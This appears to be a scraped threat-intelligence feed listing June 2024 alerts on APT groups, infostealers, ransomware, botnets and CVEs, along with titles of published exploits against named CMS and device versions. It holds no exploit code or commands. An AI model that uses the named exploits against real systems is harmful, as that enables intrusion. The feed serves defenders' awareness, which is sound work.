|
January(137) February(207) March(430) April(317) May(278) June(66) |
i |
|
DATE |
NAME |
CATEGORY |
SUBCATE |
INFO |
| 8.6.24 | Sticky Werewolf APT | ALERTS | APT | Sticky Werewolf is a threat group initially discovered over a year ago. The attackers have been known to target various organizations, most recently the pharmaceutical and aviation sectors. In their attacks the threat actors leverage malicious .lnk files disguised as .docx documents, decoy .pdf files, malicious Batch and AutoIT scripts, among others. |
| 8.6.24 | Seidr Stealer | ALERTS | Virus | Seidr is another recent infostealer variant found in the wild and sold via illicit marketplaces. The malware is C++ based with modular architecture. Functionality-wise Seidr steals various information from the compromised endpoints including, OS-related information, data collected from system browsers via keylogging, cryptocurrency wallets etc. |
| 8.6.24 | DORRA Ransomware | ALERTS | RANSOM | DORRA is a recently found ransomware variant from the Makop malware family. The malware encrypts user files, appending the ".DORRA" extension, a unique ID and the developer's email address to them. The ransomware drops a ransom note as a text file called "README-WARNING.txt" where the victims are asked to contact the attackers via provided email for further instructions regarding the data decryption. |
| 8.6.24 | Apache RocketMQ targeted in Muhstik botnet campaign | ALERTS | BOTNET | A recent campaign targeting Apache RocketMQ platforms, exploiting a known vulnerability (CVE-2023-33246) for remote code execution, has been observed. As part of the campaign, threat actors are deploying the Muhstik botnet, known for denial-of-service (DDoS) attacks. Muhstik provides persistence, evades detection, performs lateral movement, and communicates through an IRC command-and-control server. The malware can be used for cryptocurrency mining and launching distributed denial-of-service attacks. |
| 8.6.24 | Enhanced version of Vidar Stealer emerges | ALERTS | Virus | An updated version of the Vidar Stealer has been observed in the wild. This customizable malware is being sold on the dark web and Telegram channels as malware-as-a-service, leveraging social media platforms as part of its command-and-control infrastructure, and collaborating with other malware strains such as STOP/Djvu ransomware and SmokeLoader backdoor. |
| 8.6.24 | CashRansomware - a new arrival to the threat landscape | ALERTS | RANSOM | CashRansomware (aka CashCrypt) is a newly identified Ransomware‑as‑a‑Service (RaaS) variant. As reported by researchers from Tehtris, the malware appears to be still in active development. CashRansomware is C#-based malware that leverages time‑stomping techniques to detect its execution within a sandbox or a virtualized environment. |
| 8.6.24 | UNC1151 APT targets the Ukrainian Ministry of Defence with malicious Excel campaign | ALERTS | APT | The UNC1151 APT group has been observed conducting a malware campaign utilizing a malicious Excel document. This group is known for targeting Eastern European countries. In the recent campaign, UNC1151 has been observed targeting the Ukrainian Ministry of Defence, utilizing a malicious Excel document as a lure. |
| 7.6.24 | appRain CMF 4.0.5 - Remote Code Execution (RCE) (Authenticated) | WebApps | PHP | |
| 7.6.24 | CMSimple 5.15 - Remote Code Execution (RCE) (Authenticated) | WebApps | PHP | |
| 7.6.24 | WBCE CMS v1.6.2 - Remote Code Execution (RCE) | WebApps | PHP | |
| 7.6.24 | Monstra CMS 3.0.4 - Remote Code Execution (RCE) | WebApps | PHP | |
| 7.6.24 | Dotclear 2.29 - Remote Code Execution (RCE) | WebApps | PHP | |
| 7.6.24 | Serendipity 2.5.0 - Remote Code Execution (RCE) | Exploit | WebApps | PHP |
| 7.6.24 | Sitefinity 15.0 - Cross-Site Scripting (XSS) | WebApps | Multiple | |
|
7.6.24 |
REPORT |
Veeam’s goal is to relentlessly advance data and cyber resilience to keep your business running. |
||
|
7.6.24 |
CAMPAIGN |
Renewed Info Stealer Campaign Targets Ukrainian Military |
||
|
7.6.24 |
Stealer |
SPECTR Malware Targets Ukraine Defense Forces in SickSync Campaign |
||
|
7.6.24 |
GROUP |
Ghostwriter is referred as an 'activity set', with various incidents tied together by overlapping behavioral characteristics and personas, rather than as an actor or group in itself. |
||
|
7.6.24 |
Cryptojacking |
Commando Cat: A Novel Cryptojacking Attack Abusing Docker Remote API Servers |
||
|
7.6.24 |
Trojan |
Muhstik Malware Targets Message Queuing Services Applications |
||
|
6.6.24 |
App |
BoxedApp products are general packers built on top of its SDK, which provides the ability to create Virtual Storage (Virtual File System, Virtual Registry), Virtual Processes, and a universal instrumentation system (WIN/NT API hooking). |
||
|
6.6.24 |
Stealer |
Russia-linked 'Lumma' crypto stealer now targets Python devs |
||
|
6.6.24 |
CVE-2024-32113 - Path Traversal vulnerability in Apache OFBiz |
VULNEREBILITY |
CVE-2024-32113 is a recently disclosed path traversal vulnerability affecting Apache OFBiz, which is an open source enterprise resource planning (ERP) system. If successfully exploited the vulnerability might lead to remote code execution in the context of the affected service account. The vulnerability has been patched in Apache OFBiz product version 18.12.13 or above. |
|
|
6.6.24 |
Virus |
An increasing trend of abusing Packer apps as a technique to deploy malware payloads has been observed in the wild. Numerous known malware families, primarily related to RATs and stealers, have been exploiting commercial Packer apps, targeting financial institutions and government organizations. BoxedApp packer is one such utility that offers features like virtual storage, virtual processes, and a virtual registry, making it harder for endpoint protection systems to detect or analyze malware. |
||
|
6.6.24 |
The rise of Kiteshield packer in the ever-evolving landscape of Linux malware |
Virus |
Threat actors are constantly seeking out new tactics and platforms to evade detection and carry out their espionage activities. Most recently, an increasing trend in targeting the Linux platform has been observed, resulting in a surge of Linux malware. Threat actors are leveraging the Kiteshield packer to evade detection on Linux platforms. |
|
|
6.6.24 |
RANSOM |
Reports have described what seems to be an accidental cyber threat activity where a CoinMiner's proxy server was exposed to the Internet and became the target of a ransomware threat actor's RDP scan attack. This kind of practice, if it becomes more common, may complicate threat analysis as it blurs the lines between different attack groups and their intentions. |
||
|
6.6.24 |
RANSOM |
SenSayQ is an emerging ransomware actor who has recently been observed in the threat landscape. At this time, their modus operandi remains shrouded, but they employ double-extortion tactics, exfiltrating data from companies' environments and encrypting their files. This group uses a Lockbit variant to conduct encryption and it drops ransom notes in most folders ([randomID].README.txt) whose content starts with "---Welcome! Your are locked by SenSayQ!---". Similar to other ransomware actors, victims are pressured to make contact within 72 hours or else their stolen data will be published on the attacker’s website. |
||
|
6.6.24 |
RANSOM |
A new Linux variant belonging to the TargetRansomware (aka Mallox) malware family has been found in the wild. As called out in the recent report published by Trend Micro, the threat group leveraging this latest Linux variant is actively conducting attacks against ESXi environments. The attackers are also using a custom shell script for the purpose of payload delivery and victim's information exfiltration. The malware encrypts user data and appends .locked extension to the encrypted files. Upon completed encryption a ransom note in form of a text file called "HOW TO DECRYPT.txt" is dropped onto the victim's machine. |
||
|
6.6.24 |
Virus |
Cuckoo is an infostealing macOS malware initially discovered earlier this year. A new variant of it has just recently been observed in the wild. This variant has been distributed via a fake Homebrew macOS package manager website. The malware has the usual infostealing features allowing it to steal confidential information, credentials, browser cookies, cryptocurrency wallets and exfiltrate the collected data to C2 servers controlled by the attackers. The new Cuckoo variant has also added some VM environment detection capabilities. |
||
|
6.6.24 |
RANSOM |
In a newly released report, Symantec’s Threat Hunter Team provide an analysis of the highly active RansomHub ransomware and its similarity to the now defunct Knight ransomware. Analysis indicates that the developers of RansomHub are different from those that developed Knight, but based on a significant overlap of code, it's assumed the RansomHub developers likely purchased Knight source code which was offered for sale in early 2024. As with others, RansomHub attacks involve vulnerability exploitation and dual-use tools to aid in distribution. |
||
|
6.6.24 |
Virus |
The messaging application 'Signal' is famous among the military and is currently being exploited to deliver DarkCrystal RAT malware to government officials, military personnel, and representatives of defense enterprises in Ukraine. The infection chain begins when the victim receives a message with an archive, password, and instructions to open it. Inside the archive is an executable file (".pif" or ".exe"), which is a RARSFX archive containing a VBE file, a BAT file, and an EXE file. Running these files infects the computer with DarkCrystal RAT malware, granting attackers unauthorized access. |
||
|
6.6.24 |
Cobalt Strike campaign targets Ukraine using malicious Excel files |
CAMPAIGN |
A new campaign targeting Ukraine with Cobalt Strike payloads has been observed by researchers from Fortinet. The attackers leverage a multi-staged approach while delivering Excel files containing malicious VBA macros, as well as DLL downloaders and injectors in later attack stages. The Cobalt Strike payloads allow the attackers to establish communication with command and control (C2) servers and execute arbitrary commands. |
|
|
6.6.24 |
Android Spyware Targets Brazilian Mobile Users in Nubank Masquerade |
Virus |
Nubank, a leading digital bank in Latin America known for its no-fee credit card and mobile banking services, has been one of the latest financial companies to have its brand abused in social engineering schemes aimed at luring mobile users in Brazil. An actor has fabricated malicious Android applications (Nubank.apk) to appear related to Nubank. These applications are likely being distributed via malicious SMS or other social platforms. If a user is successfully lured and installs the fake Nubank app on their mobile device, they will end up with a well-known remote access trojan known as SpyNote. |
|
|
6.6.24 |
CVE-2024-24919 - Check Point Security Gateway Information Disclosure Vulnerability |
VULNEREBILITY |
CVE-2024-24919 is an information disclosure vulnerability in Check Point Security Gateway. Check Point Security Gateway is an integrated software solution that connects corporate networks, branch offices, and business partners via a secure channel. Successful exploitation of this vulnerability may allow an attacker to access certain information on internet-connected Gateways, which have been configured with IPSec VPN, remote access VPN, or mobile access software blade. Symantec's network protection technology, Intrusion Prevention System (IPS), blocks these vulnerability exploitation attempts to prevent further infection/damage to the system. |
|
|
6.6.24 |
CVE-2024–27348 - Remote Code Execution vulnerability in Apache HugeGraph Server |
VULNEREBILITY |
Recently, a critical remote code execution (RCE) vulnerability has been discovered in Apache HugeGraph-Server, identified as CVE-2024-27348 (CVSS: 9.8). Apache HugeGraph-Server is an open-source graph database that provides a scalable and high-performance solution for managing and analyzing large-scale graph data. It is commonly used in Java8 and Java11 environments. The vulnerability affects versions 1.0.0 to 1.3.0 in Java8 and Java11. This vulnerability allows an attacker to execute arbitrary commands on the server. If successfully exploited, the impact of this vulnerability can be severe, as it can allow unauthorized access to attackers to gain full control over the server, data manipulation, and potential compromise of the entire system. Symantec's network protection technology, Intrusion Prevention System (IPS) blocks these vulnerability exploitation attempts to prevent further infection/damage to the system. |
|
|
6.6.24 |
RANSOM |
Over the past year the Ransomware actor known as "Underground" has been less active than other groups, yet they remain in the threat landscape and continue to target industries of various size. They are known to generate a lengthy ransom note (!!READ_ME!!.txt) with detailed information that has been exfiltrated. Victims are provided with an ID and a password that allow them to connect with the ransomware group through a website on the TOR network. |
||
|
6.6.24 |
Virus |
A botnet malware campaign has been reported distributing the NiceRAT malware, disguising itself as Windows or Office genuine authentication tools or free game servers, through domestic file-sharing sites or blogs. NiceRAT is a Python-based open-source program with anti-debugging and anti-virtual machine capabilities. It collects system information, browser information, and cryptocurrency data from compromised systems and exfiltrates the collected data to threat actors' Discord channel, used as a Command and Control (C&C) server. |
||
|
6.6.24 |
LummaC2 Infostealer Delivered via a Recent ClearFake Campaign |
Virus |
ClearFake, a JavaScript framework, utilizes both drive-by-downloads and social engineering tactics, often in fake "browser update" campaigns. Recently, researchers uncovered a new strategy by ClearFake, where users are deceived into manually executing malicious code in PowerShell. This differs from previous tactics where users were typically lured into unwittingly downloading a malicious payload. The change aims to evade security measures and eventually install LummaC2 infostealer malware. |
|
|
6.6.24 |
Virus |
A recent campaign has seen Brazilian users being targeted by a banking Trojan dubbed CarnavalHeist. The infection chain begins with a financial themed mail through which the recipient is lured into downloading an invoice (named as "Nota Fiscal" which is Portuguese for invoice). The actual download is a malicious LNK file which leads to further downloads and executions of script components which are responsible for delivering the final malicious payload. Details regarding the campaign and suspected attacker information were made available in a newly published report by Cisco Talos. |
||
|
6.6.24 |
RedTail cryptomining malware exploiting PAN-OS vulnerability |
CRYPTOCURRENCY |
RedTail cryptocurrency mining malware has added PAN-OS vulnerability to its exploit arsenal. PAN-OS CVE-2024-3400 is a now patched vulnerability that allows an attacker to execute an arbitrary code file with root user privileges. Exploiting this PAN-OS vulnerability and executing the commands successfully can lead to the downloading of the RedTail payload. This malware employs advanced evasion and persistence techniques. RedTail has also used other propagation mechanisms involving other vulnerability exploits (such as CVE-2023-46805 and CVE-2024-21887). |
|
|
5.6.24 |
OPERATION |
Operation Crimson Palace: Sophos threat hunting unveils multiple clusters of Chinese state-sponsored activity targeting Southeast Asian government |
||
|
5.6.24 |
HACKING |
FortiGuard Labs has recently identified a sophisticated cyberattack involving an Excel file embedded with a VBA macro designed to deploy a DLL file. |
||
|
5.6.24 |
RANSOMWARE |
RansomHub: New Ransomware has Origins in Older Knight |
||
|
5.6.24 |
CVE |
This command injection vulnerability in the CGI program “remote_help-cgi” in Zyxel NAS326 and NAS542 devices could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted HTTP POST request. |
||
|
5.6.24 |
CVE |
This command injection vulnerability in the “setCookie” parameter in Zyxel NAS326 and NAS542 devices could allow an unauthenticated attacker to execute some OS commands by sending a crafted HTTP POST request. |
||
|
5.6.24 |
CVE |
This remote code execution vulnerability in the CGI program “file_upload-cgi” in Zyxel NAS326 and NAS542 devices could allow an unauthenticated attacker to execute arbitrary code by uploading a crafted configuration file to a vulnerable device. |
||
|
5.6.24 |
CVE |
This improper privilege management vulnerability in the SUID executable binary in Zyxel NAS326 and NAS542 devices could allow an authenticated local attacker with administrator privileges to execute some system commands as the “root” user on a vulnerable device. |
||
|
5.6.24 |
CVE |
This improper privilege management vulnerability in the command “show_allsessions” in Zyxel NAS326 and NAS542 devices could allow an authenticated attacker to obtain a logged-in administrator’s session information containing cookies on an affected device. |
||
|
5.6.24 |
RAT |
Hellhounds: operation Lahat |
||
|
5.6.24 |
RAT |
Hellhounds: operation Lahat |
||
|
5.6.24 |
CVE |
In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability. |
||
|
5.6.24 |
RAT |
During 2023, DarkGate made a comeback with a version full of new features, becoming one of the most preferred Remote Access Trojans (RATs) by malicious actors. |
||
|
5.6.24 |
CVE |
Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2. |
||
|
5.6.24 |
RAT |
Sophisticated RAT Targeting Gulp Projects on npm |
||
|
3.6.24 |
Malware |
Mobile malware statistics for Q1 2024: most common threats for Android, mobile banking Trojans, and ransomware Trojans. |
||
|
3.6.24 |
Malware |
Last June, we published a series of reports on Operation Triangulation, a previously unknown iOS malware platform distributed via zero-click iMessage exploits that allowed an attacker to browse and modify device files, get passwords and credentials stored in the keychain, retrieve geo-location information and execute additional modules that extended their control over compromised devices. |
||
|
3.6.24 |
Malware |
Kaspersky solutions blocked more than 658 million attacks from various online resources. |
||
|
3.6.24 |
Hardware |
Hacking Millions of Modems (and Investigating Who Hacked My Modem) |
||
|
3.6.24 |
APT |
Analysis of APT Attack Cases Using Dora RAT Against Korean Companies (Andariel Group) |
||
|
3.6.24 |
Stealer |
Fake Browser Updates delivering BitRAT and Lumma Stealer |
||
|
3.6.24 |
RAT |
Fake Browser Updates delivering BitRAT and Lumma Stealer |
||
|
1.6.24 |
Craft CMS Logs Plugin 3.0.3 - Path Traversal (Authenticated) |
|||
|
1.6.24 |
ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE) & SSH Access |
|||
|
1.6.24 |
||||
|
1.6.24 |
||||
|
1.6.24 |
||||
|
1.6.24 |
Check Point Security Gateway - Information Disclosure (Unauthenticated) |
|||
|
1.6.24 |
||||
|
1.6.24 |
||||
|
1.6.24 |
ElkArte Forum 1.1.9 - Remote Code Execution (RCE) (Authenticated) |
|||
|
1.6.24 |
||||
|
1.6.24 |
BWL Advanced FAQ Manager 2.0.3 - Authenticated SQL Injection |
|||
|
1.6.24 |
Hardware |
Lumen Technologies’ Black Lotus Labs identified a destructive event, as over 600,000 small office/home office (SOHO) routers were taken offline belonging to a single internet service provider (ISP). |